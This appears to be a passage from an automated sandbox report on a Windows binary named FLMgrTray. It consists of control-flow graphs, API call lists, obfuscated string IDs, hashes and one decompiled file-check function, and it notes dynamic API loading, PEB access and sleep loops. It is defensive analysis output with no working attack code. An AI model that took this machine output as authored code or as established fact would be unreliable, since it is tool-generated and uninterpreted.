                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,80000001,80000001,80000001,?,?), ref: 0017F442
                                                                                        • PathIsDirectoryW.SHLWAPI(0019D0A4), ref: 0017F471
                                                                                        • CreateDirectoryW.KERNEL32(0019D0A4,00000000), ref: 0017F491
                                                                                        • memset.VCRUNTIME140(?,00000000,00000200,?,80000001,80000001,80000001,?,?), ref: 0017F4A5
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000100,?,80000001,80000001,80000001,?,?), ref: 0017F4BB
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?), ref: 0017F557
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?), ref: 0017F638
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$DirectoryModulePathmemset$CreateFileFolderHandleNameOpenmemmove
                                                                                        • String ID: SI<$vZGEZVAo_IOTQQ@
                                                                                        • API String ID: 2872761359-2263311975
                                                                                        • Opcode ID: 30847d191046ca648d9c67c8620fa240c7f3394278110074ae13ce06a8b03731
                                                                                        • Instruction ID: 77672f7f7c8e9eccde54df93ca0949d966222cb4ad59f967d50734150481243a
                                                                                        • Opcode Fuzzy Hash: 30847d191046ca648d9c67c8620fa240c7f3394278110074ae13ce06a8b03731
                                                                                        • Instruction Fuzzy Hash: D5521676D206498AD712AB34DC117D9F3B4AF6A344F44C36BF909B6562FB30A7C28B44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1015 171b88-171b99 1016 171bb0-171bba 1015->1016 1017 171b9b-171b9f 1015->1017 1020 171bbe-171bc2 call 1661b0 1016->1020 1021 171bbc 1016->1021 1018 171ba3-171bae call 167960 1017->1018 1019 171ba1 1017->1019 1025 171bc7-171c01 1018->1025 1019->1018 1020->1025 1021->1020 1026 171c03-171c0f 1025->1026 1027 171c31-171c4d 1025->1027 1030 171c27-171c2e call 175733 1026->1030 1031 171c11-171c1f 1026->1031 1028 171c4f-171c5b 1027->1028 1029 171c7d-171cbc call 16a0b0 call 16a100 1027->1029 1033 171c73-171c7a call 175733 1028->1033 1034 171c5d-171c6b 1028->1034 1044 171cbe-171ce5 call 163190 1029->1044 1045 171ce8-171cee 1029->1045 1030->1027 1031->1030 1036 171c21 _invalid_parameter_noinfo_noreturn 1031->1036 1033->1029 1034->1033 1038 171c6d _invalid_parameter_noinfo_noreturn 1034->1038 1036->1030 1038->1033 1044->1045 1046 171d24-171d67 call 182540 call 183380 1045->1046 1047 171cf0-171d02 1045->1047 1059 171e90-171ebb 1046->1059 1060 171d6d-171d8a 1046->1060 1050 171d04-171d12 1047->1050 1051 171d1a-171d21 call 175733 1047->1051 1050->1051 1053 171d14 _invalid_parameter_noinfo_noreturn 1050->1053 1051->1046 1053->1051 1059->1059 1061 171ebd-171ef9 call 1829d0 1059->1061 1062 171d90-171e85 1060->1062 1066 171eff-171f04 1061->1066 1067 17203a-17205a call 183280 1061->1067 1062->1062 1064 171e8b-171e8e 1062->1064 1064->1059 1064->1061 1068 172010-172038 1066->1068 1069 171f0a-17200c 1066->1069 1072 172087-17208d 1067->1072 1073 17205c-172084 call 163190 1067->1073 1068->1067 1068->1068 1069->1068 1075 1720c3-1720f6 1072->1075 1076 17208f-1720a1 1072->1076 1073->1072 1077 172200-172228 1075->1077 1078 1720fc-1721ff 1075->1078 1080 1720a3-1720b1 1076->1080 1081 1720b9-1720c0 call 175733 1076->1081 1077->1077 1084 17222a-172244 call 183280 1077->1084 1078->1077 1080->1081 1082 1720b3 _invalid_parameter_noinfo_noreturn 1080->1082 1081->1075 1082->1081 1088 172246-17226e call 163190 1084->1088 1089 172271-172277 1084->1089 1088->1089 1091 1722ad-1722cd 1089->1091 1092 172279-17228b 1089->1092 1093 1722d3-1722dc 1091->1093 1094 17240e-172428 call 183280 1091->1094 1096 1722a3-1722aa call 175733 1092->1096 1097 17228d-17229b 1092->1097 1100 1723e4-17240c 1093->1100 1101 1722e2-1723df 1093->1101 1105 172455-17245b 1094->1105 1106 17242a-172452 call 163190 1094->1106 1096->1091 1097->1096 1098 17229d _invalid_parameter_noinfo_noreturn 1097->1098 1098->1096 1100->1094 1100->1100 1101->1100 1108 172491-1724b1 1105->1108 1109 17245d-17246f 1105->1109 1106->1105 1112 1724b7-1724c0 1108->1112 1113 1725fa-172614 call 183280 1108->1113 1110 172487-17248e call 175733 1109->1110 1111 172471-17247f 1109->1111 1110->1108 1111->1110 1115 172481 _invalid_parameter_noinfo_noreturn 1111->1115 1117 1724c6-1725c8 1112->1117 1118 1725d0-1725f8 1112->1118 1122 172616-17263e call 163190 1113->1122 1123 172641-172647 1113->1123 1115->1110 1117->1118 1118->1113 1118->1118 1122->1123 1124 17267d-1726c8 call 1718a0 call 175480 1123->1124 1125 172649-17265b 1123->1125 1137 1726ca-1726f5 call 163190 1124->1137 1138 1726f8-1726fe 1124->1138 1127 172673-17267a call 175733 1125->1127 1128 17265d-17266b 1125->1128 1127->1124 1128->1127 1131 17266d _invalid_parameter_noinfo_noreturn 1128->1131 1131->1127 1137->1138 1140 172734-17273b 1138->1140 1141 172700-172712 1138->1141 1144 17273d-172741 call 16e440 1140->1144 1145 172749-17275a call 16cb90 call 1771e0 1140->1145 1142 172714-172722 1141->1142 1143 17272a-172731 call 175733 1141->1143 1142->1143 1147 172724 _invalid_parameter_noinfo_noreturn 1142->1147 1143->1140 1152 172746 1144->1152 1155 17275f-17277a call 16f680 call 182670 1145->1155 1147->1143 1152->1145 1160 17277c-172788 1155->1160 1161 1727aa-1727c4 call 1755f4 1155->1161 1162 1727a0-1727a7 call 175733 1160->1162 1163 17278a-172798 1160->1163 1162->1161 1163->1162 1165 17279a _invalid_parameter_noinfo_noreturn 1163->1165 1165->1162
                                                                                        APIs
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00171C21
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00171C6D
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?), ref: 00171D14
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001,80000001), ref: 001720B3
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000001,80000001), ref: 0017229D
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000001,80000001), ref: 00172481
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000001,80000001), ref: 0017266D
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000001,80000001), ref: 00172724
                                                                                          • Part of subcall function 00182670: RegFlushKey.ADVAPI32(000000FF,2C80D730,00000000,00000000,0018E370,000000FF,?,0017F653), ref: 001826A2
                                                                                          • Part of subcall function 00182670: RegCloseKey.KERNEL32(000000FF,2C80D730,00000000,00000000,0018E370,000000FF,?,0017F653), ref: 001826AB
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0017279A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$CloseFlush
                                                                                        • String ID: %d.%d$zZFBVTU_Ir\SZ@w]FF[Y@l^NNWP.A
                                                                                        • API String ID: 2703687858-280114602
                                                                                        • Opcode ID: bbf1980ed42913a14a8c1569063a014f496fdec2b243979e8c1a1e0e6d2ea3b7
                                                                                        • Instruction ID: 4857b96b29d35b5c125dc9838a7624999fa851029dcdca013688caefcd621654
                                                                                        • Opcode Fuzzy Hash: bbf1980ed42913a14a8c1569063a014f496fdec2b243979e8c1a1e0e6d2ea3b7
                                                                                        • Instruction Fuzzy Hash: C762E532D257488AE7179B74CC516D9F7B5AFBA344F14C31BE444B6A62FB30A6C28740
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1169 173bd0-173c57 call 163450 call 168ab0 1174 173c5d-173c61 1169->1174 1175 173e9c-173ea1 1169->1175 1174->1175 1177 173c67-173c70 1174->1177 1176 173ea4-173ea7 1175->1176 1178 173ed4-173eda 1176->1178 1179 173ea9-173eb2 1176->1179 1180 173c73-173c90 strchr 1177->1180 1185 173edc-173ee8 1178->1185 1186 173f0a-173f22 1178->1186 1181 173eb4-173ec2 1179->1181 1182 173eca-173ed1 call 175733 1179->1182 1183 173c96-173ca8 1180->1183 1184 173ddb-173de0 1180->1184 1181->1182 1189 173ec4 _invalid_parameter_noinfo_noreturn 1181->1189 1182->1178 1191 173cd4-173ce1 1183->1191 1192 173caa-173ccf 1183->1192 1193 173de2-173de7 1184->1193 1194 173de9-173df3 1184->1194 1195 173f00-173f07 call 175733 1185->1195 1196 173eea-173ef8 1185->1196 1187 173f24-173f30 1186->1187 1188 173f52-173f6f call 1755f4 1186->1188 1197 173f32-173f40 1187->1197 1198 173f48-173f4f call 175733 1187->1198 1189->1182 1202 173ce7-173cfd 1191->1202 1203 173f70-173fb4 call 1631f0 1191->1203 1201 173e1f-173e28 1192->1201 1193->1194 1204 173e2e-173e38 1193->1204 1206 173df5-173e00 call 1622d0 1194->1206 1207 173e02-173e05 call 168b20 1194->1207 1195->1186 1196->1195 1205 173efa _invalid_parameter_noinfo_noreturn 1196->1205 1197->1198 1210 173f42 _invalid_parameter_noinfo_noreturn 1197->1210 1198->1188 1211 173e2b 1201->1211 1217 173d06-173d13 1202->1217 1218 173cff-173d04 1202->1218 1234 173fb5-173ff8 Sleep 1203->1234 1213 173e47-173e49 1204->1213 1214 173e3a-173e42 Sleep 1204->1214 1205->1195 1221 173e0a-173e1c 1206->1221 1207->1221 1210->1198 1211->1204 1223 173e4f-173e59 1213->1223 1224 173e4b-173e4d 1213->1224 1214->1180 1227 173d15-173d1a 1217->1227 1228 173d1c-173d21 1217->1228 1226 173d24-173d42 call 163200 1218->1226 1221->1201 1232 173e5b-173e66 call 1622d0 1223->1232 1233 173e68-173e6b call 168b20 1223->1233 1224->1223 1231 173e84-173e9a 1224->1231 1241 173da7-173dd9 memcpy 1226->1241 1242 173d44-173d79 memcpy 1226->1242 1227->1226 1228->1226 1231->1176 1244 173e70-173e81 1232->1244 1233->1244 1238 174137-174164 1234->1238 1239 173ffe-17402e 1234->1239 1238->1238 1240 174166-17416f GetPEB 1238->1240 1245 174030-174129 1239->1245 1246 174172-174194 1240->1246 1241->1211 1247 173d8f-173da2 call 175733 1242->1247 1248 173d7b-173d89 1242->1248 1244->1231 1245->1245 1249 17412f-174135 1245->1249 1250 174196 1246->1250 1251 1741cb-1741cd 1246->1251 1247->1211 1248->1189 1248->1247 1249->1238 1249->1240 1253 174198-1741be 1250->1253 1251->1246 1253->1253 1255 1741c0-1741c9 1253->1255 1255->1251 1256 1741cf-1741dc 1255->1256 1257 1741e2-1741e4 1256->1257 1258 17429c-1742d9 Sleep 1256->1258 1259 174295 1257->1259 1260 1741ea-174200 1257->1260 1264 174420-17444d 1258->1264 1265 1742df-174310 1258->1265 1261 174297 1259->1261 1260->1259 1263 174206-17420e 1260->1263 1261->1258 1263->1259 1266 174214-17421c 1263->1266 1264->1264 1269 17444f-174458 GetPEB 1264->1269 1267 174314-17440d 1265->1267 1268 174220-17422e 1266->1268 1267->1267 1270 174413-174419 1267->1270 1271 174261-174271 1268->1271 1272 174230-174251 1268->1272 1273 17445b-17447d 1269->1273 1270->1269 1275 17441b 1270->1275 1271->1259 1274 174273-174276 1271->1274 1272->1272 1276 174253-17425c 1272->1276 1277 1744b4-1744b6 1273->1277 1278 17447f 1273->1278 1274->1268 1275->1264 1280 17425e 1276->1280 1281 174278-174293 1276->1281 1277->1273 1279 174481-1744a7 1278->1279 1279->1279 1282 1744a9-1744b2 1279->1282 1280->1271 1281->1261 1282->1277 1283 1744b8-1744c5 1282->1283 1284 17455c-174564 1283->1284 1285 1744cb-1744cd 1283->1285 1284->1234 1286 174555-174557 1285->1286 1287 1744d3-1744e9 1285->1287 1286->1284 1287->1286 1288 1744eb-1744f3 1287->1288 1288->1286 1290 1744f5-1744fd 1288->1290 1291 174500-17450f 1290->1291 1292 174511-174530 1291->1292 1293 174540-174553 1291->1293 1292->1292 1294 174532-17453e 1292->1294 1293->1286 1293->1291 1294->1293 1295 174569-17458e 1294->1295 1295->1234
                                                                                        APIs
                                                                                          • Part of subcall function 00163450: memmove.VCRUNTIME140(?,2C80D730,?,2C80D731,?,?,?,?,00176DD2,2C80D730,2C80D731,00000000,?,?,00181718,?), ref: 00163477
                                                                                        • strchr.VCRUNTIME140(?,00000000,013C1C40,76F845B0), ref: 00173C86
                                                                                        • memcpy.VCRUNTIME140(00000000,00000000,00000010,?,?,?,?,?,013C1C40), ref: 00173D49
                                                                                        • memcpy.VCRUNTIME140(00000000,00000000,00000010,?,?,?,?,?,013C1C40), ref: 00173DB0
                                                                                        • Sleep.KERNEL32(00000001,?,00000000,?,?,013C1C40,76F845B0), ref: 00173E3C
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(013C1C40,76F845B0), ref: 00173EC4
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(013C1C40,76F845B0), ref: 00173EFA
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(013C1C40,76F845B0), ref: 00173F42
                                                                                        • Sleep.KERNEL32(006DDD00,00000000,00000010), ref: 00173FC5
                                                                                        • Sleep.KERNEL32(000003E8), ref: 001742A9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep_invalid_parameter_noinfo_noreturn$memcpy$memmovestrchr
                                                                                        • String ID: 5>I
                                                                                        • API String ID: 66369891-2468617248
                                                                                        • Opcode ID: f1c948fa93e6bd7ce63a15a5a8a99cb8ae2540b783ac7814da59411ba8b65749
                                                                                        • Instruction ID: da015e4355cb06b0a9fa1d985472126f973cf864612e48fa87ab5d177a5f24ce
                                                                                        • Opcode Fuzzy Hash: f1c948fa93e6bd7ce63a15a5a8a99cb8ae2540b783ac7814da59411ba8b65749
                                                                                        • Instruction Fuzzy Hash: 3952F675D142498FDB1ADF78C8916EDFBB1AF59340F14C31AE815B7652EB30AA82CB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1363 17f670-17f6d8 1364 17f7d0-17f7f7 1363->1364 1365 17f6de-17f7cf 1363->1365 1364->1364 1366 17f7f9-17f80a GetModuleHandleW 1364->1366 1365->1364 1367 17f810-17f835 1366->1367 1368 17f96f-17f9a1 1366->1368 1369 17f935-17f959 1367->1369 1370 17f83b-17f930 1367->1370 1371 17f9a7-17fab1 1368->1371 1372 17fab6-17fae8 1368->1372 1369->1369 1373 17f95b-17f969 LoadLibraryW 1369->1373 1370->1369 1371->1372 1372->1372 1374 17faea-17fb16 GetProcAddress 1372->1374 1373->1368 1375 17fd26-17fd3e call 1755f4 1373->1375 1376 17fca6-17fcbb GetProcAddress 1374->1376 1377 17fb1c-17fb27 1374->1377 1376->1375 1379 17fcbd-17fccf GetCurrentProcess 1376->1379 1380 17fc72-17fca4 1377->1380 1381 17fb2d-17fb68 1377->1381 1379->1375 1386 17fcd1-17fcf1 GetNativeSystemInfo 1379->1386 1380->1376 1380->1380 1382 17fb70-17fc61 1381->1382 1382->1382 1384 17fc67-17fc70 1382->1384 1384->1376 1384->1380 1387 17fcf3-17fcf7 1386->1387 1388 17fd0e-17fd25 call 1755f4 1386->1388 1387->1388 1389 17fcf9-17fd0d call 1755f4 1387->1389
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(?,?,00000001), ref: 0017F800
                                                                                        • LoadLibraryW.KERNEL32(?), ref: 0017F95F
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0017FAEF
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0017FCAB
                                                                                        • GetCurrentProcess.KERNEL32(00000000), ref: 0017FCC4
                                                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 0017FCE7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$CurrentHandleInfoLibraryLoadModuleNativeProcessSystem
                                                                                        • String ID: ,%+E$HT_XML@
                                                                                        • API String ID: 2205852423-3388141794
                                                                                        • Opcode ID: 515ae704e1d0770eb974e9c36a81256b40af12517beb8501f15ffdad8f56d1ca
                                                                                        • Instruction ID: 79bf40d0481edef3f3c00be05a555972463c81e9d5180495d866021c345a218e
                                                                                        • Opcode Fuzzy Hash: 515ae704e1d0770eb974e9c36a81256b40af12517beb8501f15ffdad8f56d1ca
                                                                                        • Instruction Fuzzy Hash: 9502E76AD257894AE703977988025D9F3B4AFB7285F54D36BF90471A62FB3076C38700
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1607 16e440-16e4c6 1608 16e5d0-16e5fb 1607->1608 1609 16e4cc-16e5c5 1607->1609 1608->1608 1610 16e5fd-16e614 LoadLibraryW 1608->1610 1609->1608 1611 16e61a-16e64b 1610->1611 1612 16e97b-16e998 call 1755f4 1610->1612 1614 16e7a6-16e7dc 1611->1614 1615 16e651-16e68c 1611->1615 1614->1614 1616 16e7de-16e7f0 GetProcAddress 1614->1616 1618 16e690-16e795 1615->1618 1620 16e7f6-16e849 memset 1616->1620 1621 16e96f-16e975 FreeLibrary 1616->1621 1618->1618 1619 16e79b-16e7a4 1618->1619 1619->1614 1619->1616 1622 16e84c-16e86d 1620->1622 1621->1612 1623 16e870-16e879 1622->1623 1623->1623 1624 16e87b-16e8b8 call 163540 1623->1624 1627 16e925-16e92e 1624->1627 1628 16e8ba-16e8c0 1624->1628 1627->1621 1629 16e930-16e93f 1627->1629 1630 16e8c6-16e8cc 1628->1630 1631 16e965-16e96c call 175733 1629->1631 1632 16e941-16e94f 1629->1632 1633 16e8ce 1630->1633 1634 16e91f 1630->1634 1631->1621 1632->1631 1635 16e951 _invalid_parameter_noinfo_noreturn 1632->1635 1636 16e8d0-16e8d4 1633->1636 1634->1627 1638 16e957-16e960 1635->1638 1639 16e8d6-16e8dc 1636->1639 1640 16e8e0-16e8e2 1636->1640 1638->1630 1639->1636 1643 16e8de 1639->1643 1640->1634 1642 16e8e4-16e8f0 1640->1642 1644 16e8f2-16e8f9 1642->1644 1643->1634 1644->1638 1645 16e8fb-16e901 1644->1645 1645->1644 1646 16e903-16e90b 1645->1646 1646->1634 1647 16e90d-16e91a call 163540 1646->1647 1647->1634
                                                                                        APIs
                                                                                        • LoadLibraryW.KERNEL32(?,2C80D730), ref: 0016E604
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0016E7E6
                                                                                        • memset.VCRUNTIME140(?,00000000,000000AA), ref: 0016E83B
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,-00000002), ref: 0016E951
                                                                                        • FreeLibrary.KERNEL32(?), ref: 0016E975
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadProc_invalid_parameter_noinfo_noreturnmemset
                                                                                        • String ID: 1-+!G$11.0
                                                                                        • API String ID: 141211723-3157209695
                                                                                        • Opcode ID: 99ca1a1e71d878a29606c6d307f1f555b2199237b39571d82dd6eca12442af48
                                                                                        • Instruction ID: 128ee923032e43522e7c488b9720237e80f398f91695f93ea87b3d517a7af408
                                                                                        • Opcode Fuzzy Hash: 99ca1a1e71d878a29606c6d307f1f555b2199237b39571d82dd6eca12442af48
                                                                                        • Instruction Fuzzy Hash: 36D10B7AD256594BD7179B38CC027E9F3B4AF6A344F14C36BE90472A61FB3066D18B40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,2C80D730,00000000,00000000), ref: 00171798
                                                                                        • RegQueryValueExA.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 001717C5
                                                                                        • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,00000000), ref: 00171817
                                                                                        • RegCloseKey.KERNEL32(00000000), ref: 0017184C
                                                                                        Strings
                                                                                        • NUY>%02x%02x%02x%02x%02x%02x, xrefs: 00171624
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue$CloseOpen
                                                                                        • String ID: NUY>%02x%02x%02x%02x%02x%02x
                                                                                        • API String ID: 1586453840-2681505518
                                                                                        • Opcode ID: 1a2634764138288bc38f60ea589c8e36987f72f2ee277edac51c200f5b7a7d9f
                                                                                        • Instruction ID: ca33cb42e172e5c043a1bf39dffa25daf6122bbe8fb15461bd6ca0c21191d693
                                                                                        • Opcode Fuzzy Hash: 1a2634764138288bc38f60ea589c8e36987f72f2ee277edac51c200f5b7a7d9f
                                                                                        • Instruction Fuzzy Hash: E6C1B776D257499EE707DB79D8016D9F7B8AF6A284F10C31BE81076562FB3066C28B40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00184D00(WCHAR* _a4) {
                                                                                        				signed int _v8;
                                                                                        				struct _WIN32_FIND_DATAW _v600;
                                                                                        				void* __ebp;
                                                                                        				signed int _t8;
                                                                                        				long _t10;
                                                                                        				long _t11;
                                                                                        				void* _t15;
                                                                                        				WCHAR* _t33;
                                                                                        				signed int _t34;
                                                                                        
                                                                                        				_t8 =  *0x19d05c; // 0x2c80d730
                                                                                        				_v8 = _t8 ^ _t34;
                                                                                        				_t33 = _a4;
                                                                                        				_t10 = GetFileAttributesW(_t33); // executed
                                                                                        				if(_t10 == 0xffffffff) {
                                                                                        					_t11 = GetLastError();
                                                                                        					if(_t11 == 2 || _t11 == 3 || _t11 == 0x7b) {
                                                                                        						L8:
                                                                                        						return E001755F4(_v8 ^ _t34);
                                                                                        					} else {
                                                                                        						_t15 = FindFirstFileW(_t33,  &_v600);
                                                                                        						if(_t15 == 0xffffffff) {
                                                                                        							goto L8;
                                                                                        						} else {
                                                                                        							FindClose(_t15);
                                                                                        							if(( !(_v600.dwFileAttributes >> 4) & 0x00000001) == 0) {
                                                                                        								goto L8;
                                                                                        							} else {
                                                                                        								return E001755F4(_v8 ^ _t34);
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        				} else {
                                                                                        					return E001755F4(_v8 ^ _t34);
                                                                                        				}
                                                                                        			}












                                                                                        0x00184d09
                                                                                        0x00184d10
                                                                                        0x00184d14
                                                                                        0x00184d18
                                                                                        0x00184d21
                                                                                        0x00184d3a
                                                                                        0x00184d43
                                                                                        0x00184d8d
                                                                                        0x00184d9d
                                                                                        0x00184d4f
                                                                                        0x00184d57
                                                                                        0x00184d60
                                                                                        0x00000000
                                                                                        0x00184d62
                                                                                        0x00184d63
                                                                                        0x00184d77
                                                                                        0x00000000
                                                                                        0x00184d79
                                                                                        0x00184d8c
                                                                                        0x00184d8c
                                                                                        0x00184d77
                                                                                        0x00184d60
                                                                                        0x00184d23
                                                                                        0x00184d39
                                                                                        0x00184d39

                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00184D18
                                                                                        • GetLastError.KERNEL32 ref: 00184D3A
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00184D57
                                                                                        • FindClose.KERNEL32(00000000), ref: 00184D63
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$AttributesCloseErrorFirstLast
                                                                                        • String ID:
                                                                                        • API String ID: 1980345056-0
                                                                                        • Opcode ID: a10647e75253797c89e4d5552a5605bb431b95a340ec815c81a1545650a80ca2
